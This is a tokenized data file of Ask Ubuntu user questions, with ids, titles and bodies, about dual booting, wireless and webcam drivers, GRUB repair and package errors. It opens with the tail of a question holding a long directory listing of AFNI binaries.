plug_volreg.so -rwxr-xr-x 1 owner owner 28108 nov 29 20:52 plug_wavelets.so -rwxr-xr-x 1 owner owner 10030 nov 29 20:52 plug_zeropad.so -rwxr-xr-x 1 owner owner 11308903 nov 29 21:01 prompt_user -rwxr-xr-x 1 owner owner 1783 nov 29 21:01 @ purify_1d -rwxr-xr-x 1 owner owner 8289 nov 29 21:01 python_module_test.py -rwxr-xr-x 1 owner owner 298646 nov 29 20:45 qdelaunay -rwxr-xr-x 1 owner owner 302292 nov 29 20:45 qhull -rwxr-xr-x 1 owner owner 1909 nov 29 21:01 quick.alpha.vals.py -rwxr-xr-x 1 owner owner 11257559 nov 29 21:01 quickspec -rwxr-xr-x 1 owner owner 8523 nov 29 21:01 @ quiet_talkers -rwxr-xr-x 1 owner owner 19607 nov 29 21:01 @ radial_correlate -rwxr-xr-x 1 owner owner 292354 nov 29 20:45 rbox -rwxr-xr-x 1 owner owner 1511 nov 29 21:01 rcmat.h -rw-r -- r -- 1 owner owner 2402 nov 29 21:01 readme.3dsvm.realtime -rw-r -- r -- 1 owner owner 14096 nov 29 21:01 readme.afnigui -rw-r -- r -- 1 owner owner 6080 nov 29 21:01 readme.atlas_building -rw-r -- r -- 1 owner owner 45863 nov 29 21:01 readme.attributes -rw-r -- r -- 1 owner owner 46932 nov 29 21:01 readme.bzip2 -rwxr-xr-x 1 owner owner 2194 nov 29 20:33 readme.caez_atlas_build -rw-r -- r -- 1 owner owner 476 nov 29 21:01 readme.changes -rw-r -- r -- 1 owner owner 4707 nov 29 21:01 readme.compression -rw-r -- r -- 1 owner owner 25610 nov 29 21:01 readme.copyright -rw-r -- r -- 1 owner owner 30919 nov 29 21:01 readme.driver -rw-r -- r -- 1 owner owner 173673 nov 29 21:01 readme.environment -rw-r -- r -- 1 owner owner 5657 nov 29 21:01 readme.func_types -rw-r -- r -- 1 owner owner 587 nov 29 21:01 readme.ifile -rw-r -- r -- 1 owner owner 6451 nov 29 21:01 readme.notes -rw-r -- r -- 1 owner owner 1684 nov 29 21:01 readme.permtest -rw-r -- r -- 1 owner owner 553 nov 29 21:01 readme.plugouts -rw-r -- r -- 1 owner owner 18268 nov 29 21:01 readme.realtime -rw-r -- r -- 1 owner owner 31330 nov 29 21:01 readme.registration -rw-r -- r -- 1 owner owner 7415 nov 29 21:01 readme.render_scripts -rw-r -- r -- 1 owner owner 6842 nov 29 21:01 readme.roi -rw-r -- r -- 1 owner owner 9487 nov 29 21:01 readme.setup -rw-r -- r -- 1 owner owner 6113 nov 29 21:01 readme.volreg -rw-r -- r -- 1 owner owner 1649 nov 29 21:01 readme.web -rw-r -- r -- 1 owner owner 0 nov 29 21:01 readme.ziad -rwxr-xr-x 1 owner owner 22443 nov 29 21:01 realtime_receiver.py -rwxr-xr-x 1 owner owner 12487 nov 29 21:01 @ renamepanga -rwxr-xr-x 1 owner owner 6826 nov 29 21:01 @ reorder -rwxr-xr-x 1 owner owner 69275 nov 29 21:01 @ retinoproc -rwxr-xr-x 1 owner owner 1010 nov 29 21:01 @ r_funclist -rwxr-xr-x 1 owner owner 1161 nov 29 21:01 r_idisp.h -rwxr-xr-x 1 owner owner 4891010 nov 29 20:40 r_io.so -rwxr-xr-x 1 owner owner 742 nov 29 21:01 r_misc.h -rwxr-xr-x 1 owner owner 3434934 nov 29 20:51 rmz -rwxr-xr-x 1 owner owner 830 nov 29 21:01 r_new_resam_dset.h -rwxr-xr-x 1 owner owner 11261471 nov 29 21:01 roi2dataset -rwxr-xr-x 1 owner owner 16964 nov 29 21:01 @ roi_corr_mat -rwxr-xr-x 1 owner owner 11318872 nov 29 21:01 roigrow -rwxr-xr-x 1 owner owner 3473422 nov 29 20:46 rotcom -rwxr-xr-x 1 owner owner 3448411 nov 29 20:44 rsfgen -rwxr-xr-x 1 owner owner 3446887 nov 29 20:46 rtfeedme -rwxr-xr-x 1 owner owner 11261647 nov 29 21:01 sampbias -rwxr-xr-x 1 owner owner 11267819 nov 29 21:01 scaletomap -rwxr-xr-x 1 owner owner 10283 nov 29 21:01 @ scalevolume -rwxr-xr-x 1 owner owner 305 nov 29 20:33 scan_niml_vals.csh -rwxr-xr-x 1 owner owner 3813 nov 29 21:01 @ scriptcheck -rwxr-xr-x 1 owner owner 28744 nov 29 20:46 serial_helper -rwxr-xr-x 1 owner owner 3443924 nov 29 20:43 sfim -rwxr-xr-x 1 owner owner 5491 nov 29 21:01 @ shift_volume -rwxr-xr-x 1 owner owner 2943 nov 29 21:01 @ showdynamicrange -rwxr-xr-x 1 owner owner 3439042 nov 29 20:46 siemens_vision -rwxr-xr-x 1 owner owner 21966 nov 29 21:01 signatures.r -rwxr-xr-x 1 owner owner 27916 nov 29 21:01 @ simulate_motion -rwxr-xr-x 1 owner owner 12546 nov 29 21:01 slow_surf_clustsim.py -rwxr-xr-x 1 owner owner 1063 nov 29 21:01 smooth.r -rwxr-xr-x 1 owner owner 11284079 nov 29 21:01 spharmdeco -rwxr-xr-x 1 owner owner 6649 nov 29 21:01 @ spharm.examples -rwxr-xr-x 1 owner owner 11275248 nov 29 21:01 spharmreco -rwxr-xr-x 1 owner owner 7612 nov 29 20:43 sqwave -rwxr-xr-x 1 owner owner 1128 nov 29 21:01 @ statauxcode -rwxr-xr-x 1 owner owner 3439004 nov 29 20:45 strblast -rwxr-xr-x 1 owner owner 12036076 nov 29 21:01 suma -rwxr-xr-x 1 owner owner 46630 nov 29 21:01 @ suma_aligntoexperiment -rwxr-xr-x 1 owner owner 4454 nov 29 21:01 suma_change_spec -rwxr-xr-x 1 owner owner 3663 nov 29 21:01 @ suma_fsvoltobrik -rwxr-xr-x 1 owner owner 16282 nov 29 21:01 suma_glxdino -rwxr-xr-x 1 owner owner 30640 nov 29 21:01 @ suma_make_spec_caret -rwxr-xr-x 1 owner owner 43418 nov 29 21:01 @ suma_make_spec_fs -rwxr-xr-x 1 owner owner 20693 nov 29 21:01 @ suma_make_spec_sf -rwxr-xr-x 1 owner owner 1196794 nov 29 21:01 suma_paperplane -rwxr-xr-x 1 owner owner 16235 nov 29 21:01 suma_pixmap2eps -rwxr-xr-x 1 owner owner 11319879 nov 29 21:01 surf2volcoord -rwxr-xr-x 1 owner owner 11288478 nov 29 21:01 surfacemetrics -rwxr-xr-x 1 owner owner 11265699 nov 29 21:01 surfclust -rwxr-xr-x 1 owner owner 11260459 nov 29 21:01 surfdist -rwxr-xr-x 1 owner owner 11307483 nov 29 21:01 surfdsetinfo -rwxr-xr-x 1 owner owner 11313913 nov 29 21:01 surfextrema -rwxr-xr-x 1 owner owner 11325245 nov 29 21:01 surffwhm -rwxr-xr-x 1 owner owner 11309999 nov 29 21:01 surfinfo -rwxr-xr-x 1 owner owner 11335258 nov 29 21:01 surfmeasures -rwxr-xr-x 1 owner owner 11721032 nov 29 21:01 surfmesh -rwxr-xr-x 1 owner owner 11268881 nov 29 21:01 surfpatch -rwxr-xr-x 1 owner owner 11261872 nov 29 21:01 surfqual -rwxr-xr-x 1 owner owner 11318969 nov 29 21:01 surfretinomap -rwxr-xr-x 1 owner owner 11323055 nov 29 21:01 surfsmooth -rwxr-xr-x 1 owner owner 11984 nov 29 21:01 @ surfsmooth.heat_07.examples -rwxr-xr-x 1 owner owner 11330294 nov 29 21:01 surftosurf -rwxr-xr-x 1 owner owner 10077 nov 29 21:01 @ t1scale -rwxr-xr-x 1 owner owner 1938 nov 29 21:01 tagset.h -rwxr-xr-x 1 owner owner 3444177 nov 29 20:43 tfim -rwxr-xr-x 1 owner owner 6453 nov 29 21:01 thd_atlas.h -rwxr-xr-x 1 owner owner 3010 nov 29 21:01 thd_compress.h -rwxr-xr-x 1 owner owner 5926 nov 29 21:01 thd_iochan.h -rwxr-xr-x 1 owner owner 1678 nov 29 21:01 thd_maker.h -rwxr-xr-x 1 owner owner 1052 nov 29 21:01 thd_ttatlas_ca_ez.h -rwxr-xr-x 1 owner owner 28648 nov 29 21:01 thd_ttatlas_query.h -rwxr-xr-x 1 owner owner 1106 nov 29 21:01 @ timediff -rwxr-xr-x 1 owner owner 64032 nov 29 21:01 timing_tool.py -rwxr-xr-x 1 owner owner 6070158 nov 29 20:43 to3d -rwxr-xr-x 1 owner owner 3729 nov 29 21:01 @ tomni_awarp -rwxr-xr-x 1 owner owner 16674 nov 29 21:01 @ tomni_qwarpar -rwxr-xr-x 1 owner owner 2004 nov 29 21:01 @ torai -rwxr-xr-x 1 owner owner 377624 nov 29 20:33 ttatlas+tlrc.brik.gz -rwxr-xr-x 1 owner owner 40896 nov 29 20:33 ttatlas+tlrc.head -rwxr-xr-x 1 owner owner 794290 nov 29 20:33 tt_avg152t1+tlrc.brik.gz -rwxr-xr-x 1 owner owner 4932 nov 29 20:33 tt_avg152t1+tlrc.head -rwxr-xr-x 1 owner owner 781798 nov 29 20:33 tt_avg152t2+tlrc.brik.gz -rwxr-xr-x 1 owner owner 5440 nov 29 20:33 tt_avg152t2+tlrc.head -rwxr-xr-x 1 owner owner 1356732 nov 29 20:33 tt_caez_colin27_t1_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 8799 nov 29 20:33 tt_caez_colin27_t1_18+tlrc.head -rwxr-xr-x 1 owner owner 2928274 nov 29 20:33 tt_caez_gw_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 8473 nov 29 20:33 tt_caez_gw_18+tlrc.head -rwxr-xr-x 1 owner owner 151399 nov 29 20:33 tt_caez_lr_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 8585 nov 29 20:33 tt_caez_lr_18+tlrc.head -rwxr-xr-x 1 owner owner 230450 nov 29 20:33 tt_caez_ml_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 23852 nov 29 20:33 tt_caez_ml_18+tlrc.head -rwxr-xr-x 1 owner owner 197143 nov 29 20:33 tt_caez_mpm_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 17687 nov 29 20:33 tt_caez_mpm_18+tlrc.head -rwxr-xr-x 1 owner owner 2953181 nov 29 20:33 tt_caez_pmaps_18+tlrc.brik.gz -rwxr-xr-x 1 owner owner 23949 nov 29 20:33 tt_caez_pmaps_18+tlrc.head -rwxr-xr-x 1 owner owner 138445 nov 29 20:33 tt_desai_dd_mpm+tlrc.brik.gz -rwxr-xr-x 1 owner owner 35035 nov 29 20:33 tt_desai_dd_mpm+tlrc.head -rwxr-xr-x 1 owner owner 3519331 nov 29 20:33 tt_desai_ddpmaps+tlrc.brik.gz -rwxr-xr-x 1 owner owner 214682 nov 29 20:33 tt_desai_ddpmaps+tlrc.head -rwxr-xr-x 1 owner owner 131991 nov 29 20:33 tt_desai_dk_mpm+tlrc.brik.gz -rwxr-xr-x 1 owner owner 21386 nov 29 20:33 tt_desai_dk_mpm+tlrc.head -rwxr-xr-x 1 owner owner 2419046 nov 29 20:33 tt_desai_dkpmaps+tlrc.brik.gz -rwxr-xr-x 1 owner owner 128396 nov 29 20:33 tt_desai_dkpmaps+tlrc.head -rwxr-xr-x 1 owner owner 1568559 nov 29 20:33 tt_desai_fspmaps+tlrc.brik.gz -rwxr-xr-x 1 owner owner 112365 nov 29 20:33 tt_desai_fspmaps+tlrc.head -rwxr-xr-x 1 owner owner 791958 nov 29 20:33 tt_epi+tlrc.brik.gz -rwxr-xr-x 1 owner owner 4897 nov 29 20:33 tt_epi+tlrc.head -rwxr-xr-x 1 owner owner 2184281 nov 29 20:33 tt_icbm452+tlrc.brik.gz -rwxr-xr-x 1 owner owner 8730 nov 29 20:33 tt_icbm452+tlrc.head -rwxr-xr-x 1 owner owner 701987 nov 29 20:33 tt_n27_ca_ez_mpm+tlrc.brik.gz -rwxr-xr-x 1 owner owner 12387 nov 29 20:33 tt_n27_ca_ez_mpm+tlrc.head -rwxr-xr-x 1 owner owner 552746 nov 29 20:33 tt_n27_ca_ez_pmaps+tlrc.brik.gz -rwxr-xr-x 1 owner owner 18436 nov 29 20:33 tt_n27_ca_ez_pmaps+tlrc.head -rwxr-xr-x 1 owner owner 59999 nov 29 20:33 tt_n27_ez_lr+tlrc.brik.gz -rwxr-xr-x 1 owner owner 11839 nov 29 20:33 tt_n27_ez_lr+tlrc.head -rwxr-xr-x 1 owner owner 114420 nov 29 20:33 tt_n27_ez_ml+tlrc.brik.gz -rwxr-xr-x 1 owner owner 15625 nov 29 20:33 tt_n27_ez_ml+tlrc.head -rwxr-xr-x 1 owner owner 1353925 nov 29 20:33 tt_n27+tlrc.brik.gz -rwxr-xr-x 1 owner owner 11447 nov 29 20:33 tt_n27+tlrc.head -rwxr-xr-x 1 owner owner 9891 nov 29 21:01 uber_align_test.py -rwxr-xr-x 1 owner owner 10798 nov 29 21:01 uber_proc.py -rwxr-xr-x 1 owner owner 10002 nov 29 21:01 uber_skel.py -rwxr-xr-x 1 owner owner 19585 nov 29 21:01 uber_subject.py -rwxr-xr-x 1 owner owner 12252 nov 29 21:01 uber_ttest.py -rwxr-xr-x 1 owner owner 45044 nov 29 21:01 ui_xmat.py -rw-r -- r -- 1 owner owner 4784 nov 29 20:33 unc_infant_customatlases.niml -rwxr-xr-x 1 owner owner 6186 nov 29 21:01 @ updateafni -rwxr-xr-x 1 owner owner 14894 nov 29 21:01 @ update.afni.binaries -rwxr-xr-x 1 owner owner 34890 nov 29 21:01 vecmat.h -rwxr-xr-x 1 owner owner 3578702 nov 29 20:45 vecwarp -rwxr-xr-x 1 owner owner 6508 nov 29 21:01 vol2surf.h -rwxr-xr-x 1 owner owner 3150 nov 29 21:01 @ volcenter -rwxr-xr-x 1 owner owner 25376 nov 29 21:01 volpack.h -rwxr-xr-x 1 owner owner 3453741 nov 29 20:43 waver -rwxr-xr-x 1 owner owner 3912691 nov 29 20:47 whereami -rwxr-xr-x 1 owner owner 17987 nov 29 20:51 whirlgif -rwxr-xr-x 1 owner owner 453 nov 29 21:01 xmat_tool.py -rwxr-xr-x 1 owner owner 5943491 nov 29 20:51 xphace -rwxr-xr-x 1 owner owner 3056 nov 29 21:01 znzlib.h ubuntu : ~ > and i do n't know if this is all of it . is it supposed to be this long ?
384352	installation of windows on preinstalled ubuntu 13.10	i installed ubuntu 13.10 on laptop , now i want to install windows 8 along with ubuntu .how do i manage it ? thanks .
384355	what is the easiest/simplest way to uninstall the vga driver that comes with the installation ?	i am planning to install the propiatery driver of my ati radeon hd 5650 and i am wondering what is the best way for a newbie to get rid of the original driver that came with the installation ? is there a way to double check that i have done it correctly ? for example , a command that i could run before and after the uninstalation ? thanks .
384358	kde desktop and screenlets	i 'm using ubuntu 13.10 , and just added kde . screenlets do not work on my desktop , neither do the included kde weather widgets . they were working fine under unity . can i get your help in getting my screenlets to work in kde ? thanks .
384359	boot repair disk not running ; no internet access	i was installing ubuntu 13.04 alongside windows 8 from a flash drive yesterday . i had installed it next to windows 7 before on a similar device before and had not encountered any problems . firstly , in the installation screens , ubuntu would n't connect to the wifi , i thought this would clear up after i installed it however ( it did n't ) . when i got to the partitioning screen it was a bit odd . the last time i installed ubuntu it was divided into occupied space and free space , this time the hard drive was different . there were like 6 different partitions , something like recovery , system volume , sda/1 , sda/2 , sda/3 , sda/4 , sda/5 . the majority of space was on sda/4 ( something like 480 gb out of 500 ) so i clicked somethings and half of sda/4 split into sda/6 . i chose to mount on sda/6 and the rest installed fine ( although w/o internet ) when i restarted the computer , it booted straight to ubuntu without giving me an option to load windows 8 . the computer also would n't connect to the internet through wifi or ethernet . to try and fix the booting problem i burned the boot repair disk ( i tried it twice ) but both times it sort of just sat there . i 'm not sure if i burned it incorrectly or something else . from what i 've read something is supposed to come up quite easily , and it did n't . i also tried 'boot-repair ' in the terminal and that did n't work either . due to the lack of internet apt-getting boot repair was also crossed off as an option i can post anything as needed ( i 'm not really sure what would help ) my flaccid boot repair : http : //i.imgur.com/xvtklh7.png http : //i.imgur.com/j3xz8eb.png thank you in advance !
384361	problems with wireless connection using broadcom corporation bcm4352 802.11ac wireless network adapter	i have a dell laptop precision m6800 running ubuntu 12.04.03 lts and have problems to recognize my wireless card . it is a dual boot machine with windows 8.1 in which the wireless card works fine . in linux , the wireless lamp is not even on . he is some relevant output . lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-lm ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d4 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d4 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d4 ) 00:1c.6 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 7 ( rev d4 ) 00:1c.7 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 8 ( rev d4 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm87 express lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk104glm [ quadro k4100m ] ( rev ff ) 03:00.0 network controller : broadcom corporation bcm4352 802.11ac wireless network adapter ( rev 03 ) 11:00.0 sd host controller : o2 micro , inc. device 8520 ( rev 01 ) lshw -c network *-network description : ethernet interface product : ethernet connection i217-lm vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : f0:1f : af:56:21 : ca size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k duplex=full firmware=0.13-3 ip=192.168.0.101 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : f7a00000-f7a1ffff memory : f7a3d000-f7a3dfff ioport : f080 ( size=32 ) *-network unclaimed description : network controller product : bcm4352 802.11ac wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f5a00000-f5a07fff memory : f5800000-f59fffff iwconfig eth0 no wireless extensions . lo no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr f0:1f : af:56:21 : ca inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f21f : afff : fe56:21ca/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:223640 errors:0 dropped:0 overruns:0 frame:0 tx packets:151245 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:313133346 ( 313.1 mb ) tx bytes:14012600 ( 14.0 mb ) interrupt:20 memory : f7a00000-f7a20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:112 errors:0 dropped:0 overruns:0 frame:0 tx packets:112 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:7720 ( 7.7 kb ) tx bytes:7720 ( 7.7 kb ) thus , wlan0 is not even seen . i have installed already firmware-b43-installer b43-fwcutter . any help is appreciated .
384363	error about environmental variables	i have installed the program root from the website of cern nearly a year ago and later tried to manually uninstall it ; however there are problems lingering and i get the error : bash : /home/ongun/desktop/root/bin/thisroot.sh : no such file or directory i think that this problem is related with environmental variables . how can i resolve this issue ? i would be glad if you can provide assistance .
384366	updated virtualbox and lost my previous vb	i just updated my virtualbox because it said there was a newer version . now i can not find my previous vb directory . i see the hdd is still has part of the hdd partitioned for the virtualbox machine from the previous vb . is there a way to re-use my old vb guest os ? is there a way to recover the data in the vb guest os partition ? does this mean i have to re-install my guest os and start over ? why is there no warning this is going to happen before you do it ?
384368	does the `` remote login '' function allow connection to vpns ?	does the `` remote login '' function allow connection to vpns such as linode ? i 've never had a vpn before but i am looking in to buying a linode and i 'm wondering if remote login allows easy access . would it be limited to console access or could i graphically access the vpn ? thank you !
384370	how to disable ir receiver on macbook pro ?	i have a macbook pro 9.2 and i need to disable the ir receiver because my kids use the apple tv and its remote messes with my computer . i have ubuntu 13.10 dual booted .
384371	c510 camera not working in skype	i have a c510 logitech camera running 12.04 . looking up the list of cameras , this should just work out of the box , but it does not work in skype . lsusb gives this as the camera : bus 003 device 003 : id 046d:081d logitech , inc. hd webcam c510 skype lists uvc camera ( 046d:081d ) ( /dev/video0 ) but just show a black screen . it works perfectly in guvcview . running locate v4l1compat.so gives : /usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so i 've looked extensively on how to make this work and every suggested solution is : ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype which gives me : `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:21326 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:21326 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:21326 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:21326 ) : gtk-warning ** : failed to load type module : ( null ) however when i use sudo env ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype it works but when i go to test the video in skype , i get : libv4l2 : error turning on stream : input/output error i 'm not sure what exactly i need to do to make this work in skype . am i missing something obvious ? please help .
384372	installation on sony vaio svs1511a4e single boot	i need to install ubuntu single boot on a sony vaio svs1511a4e laptop , which specs are : http : //www.sony.fr/support/fr/product/svs1511a4e/specifications the bios is h20 and there is nvidia card on it , ( plus i use a ssd drive samsung 840 instead of the original drive if it has any importance to be mentioned ) so what is the best procedure to install ubuntu on it , and which version is the best ( from 12.04 to latest ) ? i prefer stability and efficiency of power management ( nvidia card ) over functionalities . any help would be greatly appreciated , thank you very much .
384373	sort filea into fileb while actively removing lines from filea	i tried simplifying the title , apologies if it 's somewhat confusing . i have a large text file ( file a ) ( around 13gb ) and i want to sort through it ( into file b ) to delete duplicate lines . problem is i have a limited amount of space , so i ca n't create a file around the same size . is there a way to actively delete lines that are sorted from file a ? my sort code : awk ' ! x [ $ 0 ] ++ ' filea.lst > fileb.lst
384374	configure gamepad	i have a problem i need to configure gamepad on ubuntu i installed jstest-gtk and i see that it think that i am pressing a button on my gamepad but the problem is that i do not have that many buttons at all it thinks that i am pressing a button that my gamepad does not even have can i disable this button in configure files or somewhere ? ?
384375	how can i get firefox to open torrent files with transmission ?	every time i download a torrent file ( .torrent ) , firefox thinks i should open it with a text editor . how can i get it to open with transmission ? in edit - > preferences - > applications , there 's no setting for torrent files , and no apparent way to add a new filetype .
384376	how to install canon printer/scanner mg5460 on ubuntu 13.10	i have tried to install my mg 5460 multifunction machine on ubuntu 13.10 with no luck . could you possibly help or guide me with the downloads and commands that i need for success please ?
384382	set a password for boot from usbs	when i first booted from my usb i was asked if i wanted to require a password on login . i answered `` no '' but now i want to change my mind . how to i make it require a password ?
384383	xubuntu startup crash : error disk ' , gpt2 ' grub rescue	gparted froze up a couple of times while i was reformatting a micro sd card with my xubuntu hp . i was n't able to restart gparted , as it had crashed , so i manually restarted ( power button ) my machine , as i had done a few times before . this time , however , immediately upon powering up , the very first thing on my black screen : error disk ' , gpt2 ' grub rescue i read that i might be able to use boot-repair to solve this problem . i booted via my original xubuntu dvd , but boot repair does n't seem to be able to fix the issue ... is it true that i may need to reformat my drive and reinstall xubuntu ? if this is the case , do you know of a way for me to save the data on my machine before it is wiped ? this is my generated boot repair url
384385	ca n't boot into windows 8 after boot repair	i have a lenovo y510p laptop and managed to get windows 8 and ubuntu 13.10 dual booting . but then after grub was updated , i had to run boot-repair and now i ca n't boot into windows . when the computer starts and grub shows , i can boot into ubuntu without a problem , but if i choose windows from the boot menu , it just goes back to the menu . i do n't really know what kind of information i should provide , so please let me know if anything else besides what i posted bellow is needed . my bios boot configuration is the following : boot type : uefi secure boot : disabled here is my grub.cfg file : http : //paste.ubuntu.com/6501866/ here is my boot info from boot-repair : http : //paste.ubuntu.com/6501878/
384388	how to select option in `` configuration grub-pc '' menu	i would like to select /dev/sda in the `` configuration grub-pc '' menu that popped up in my terminal while upgrading my distro version . however , i have no idea how to select it ! every key i press either does nothing , or takes me to a second menu that says `` you chose not to install grub to any devices . '' how do i select it ? when i select < ok > without selecting an option :
384390	black screen with white text on startup	i 'll preface by saying the 'questions that may already have your answer ' have n't helped me . ok , about a month ago i installed ubuntu onto my mac mini , it worked . then the mac mini went under my bed and sat there doing nothing for a month . i dug it out and put it in my flat 's kitchen hooked up to the tv today and it appears to be dead . when i turn it on , after the initial white mac startup screen , the screen goes black , then a black screen with a white flashing dash appears . after that the screen goes to the purple 'ubuntu 12.04 ' screen with 4 dots that each light up . after this , there is a lot of white ( and some yellow ) text , then the text stops scrolling and just stays for hours . when i begin holding the power button to turn the mac off the text starts moving again until the computer is off . it 's driving me mad and i want it working before some flatmates get back tomorrow so i can continue watching movies in there . just to add , i no longer have an osx partition . it 's all ubuntu , i do have a separate computer running windows 8 which i can use for creating bootable usbs and such .
384391	rabittv on ubuntu 13.04	trying to install rabbit tv to tried these command lines : sudo add-apt-repository ppa : rabbitvcs/ppa sudo apt-get update sudo apt-get install rabbitvcs-core install nautilus , thunar , gedit and command line pluggings using the following command sudo apt-get install rabbitvcs-nautilus rabbitvcs-thunar rabbitvcs-gedit rabbitvcs-cli all i get is a error on the last one unable to locate package rabbitvcs-thunar
384392	can i generate an installation cd image from my current installation ? how do i clone an ubuntu install ?	i recently upgraded my installation of 13.04 to 13.10 . my friend has seen this and would like to install ubuntu . is there any way i can generate an installation cd from my current install without just downloading the iso so that we can do a install on my friend 's computer ?
384398	help needed to install bluegriffon	i have read the thread `` need help in installing bluegriffon '' and followed the instructions . two things : first it may be because i have ubnuntu 13.10 and bluegriffon 's latest version seems to go with 13.04 ( 64-bit variety ) , but when i open the terminal i get the following message : ( process:3173 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed *** log addons.xpi : startup *** log addons.xpi : checkforchanges *** log addons.xpi : no changes found *** log addons.xpi-utils : opening database *** log addons.manager : shutdown *** log addons.xpi : shutdown *** log addons.xpi-utils : shutdown *** log addons.xpi-utils : database closed but the software opens up apparently normally after this . and my efforts to make an icon appear in my unity desktop fail after following the instructions . any help , please ?
384399	will i lose my data is i `` write mbr partition table to disk and exit '' in gparted ?	i 've never used ubuntu before and i 'm trying to install it . apparently ubuntu thinks i do n't have windows 7 installed , so i do n't have the option to install it alongside windows . i found a tutorial that is supposedly going to fix this problem using gparted and the fixparts command . the commands are sudo apt-get install gdisk , then sudo fixparts /dev/sdc and finally `` w '' for the option write mbr partition table to disk and exit i did not proceed as i got a warning that said it will overwrite all existing partitions . will i lose all the data on the drive doing this ? or will it still be there ?
384401	separate executables to store onto ssd	i want a solid-state-drive ( ssd ) for speed but since they degrade when written to , i want to keep frequently written/rewritten files on my old hd . is there a common arrangement already available to isolate boot and program files for read-only ( like run from dvd ) ? , will i be thwarted by latest-access stamps updated even when their files are only read/executed ?
384403	my update manager doest work ?	i need to upgrade , but my update manager doesnt work , this is the error msg : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages e : the package lists or status file could not be parsed or opened what to do ? how to upgrade ? help ! ! !
384406	login fails after fixing broken packages	i fixed broken packages , now at boot up i get a black screen and logon . after entering the logon info it returns a black screen with terminal start request for info . help , i 'm lost and do n't know what information to enter .
384407	problems installing desktop	i try to boot from cd . get the menu , tell it to either install or run from cd and i just get a lot of hex binary items and it will not install . system asus a7s333 1250mb ram
384410	how to find and add drivers to 13.10 ?	just bought a new computer with splendid features inside ... ( hp envy dv7-7300/ct i-7 core . n-vidia 2gb video ... a `` beats by dre '' speaker with built in bass ... ) since i cleared the windows off from the laptop and installed ubuntu 13.10 , the performance sensible slowed down , so as video process got weaker , speakers sounds painfully weak standard factory sound , and there is no options or equalizer . to make them better . i am assuming i might have to wait for the latest updates to get these features supported or which is more likely i did not install the additional software i should have ... question is : how can i make them coop ? much appreciated for the guidance and help .
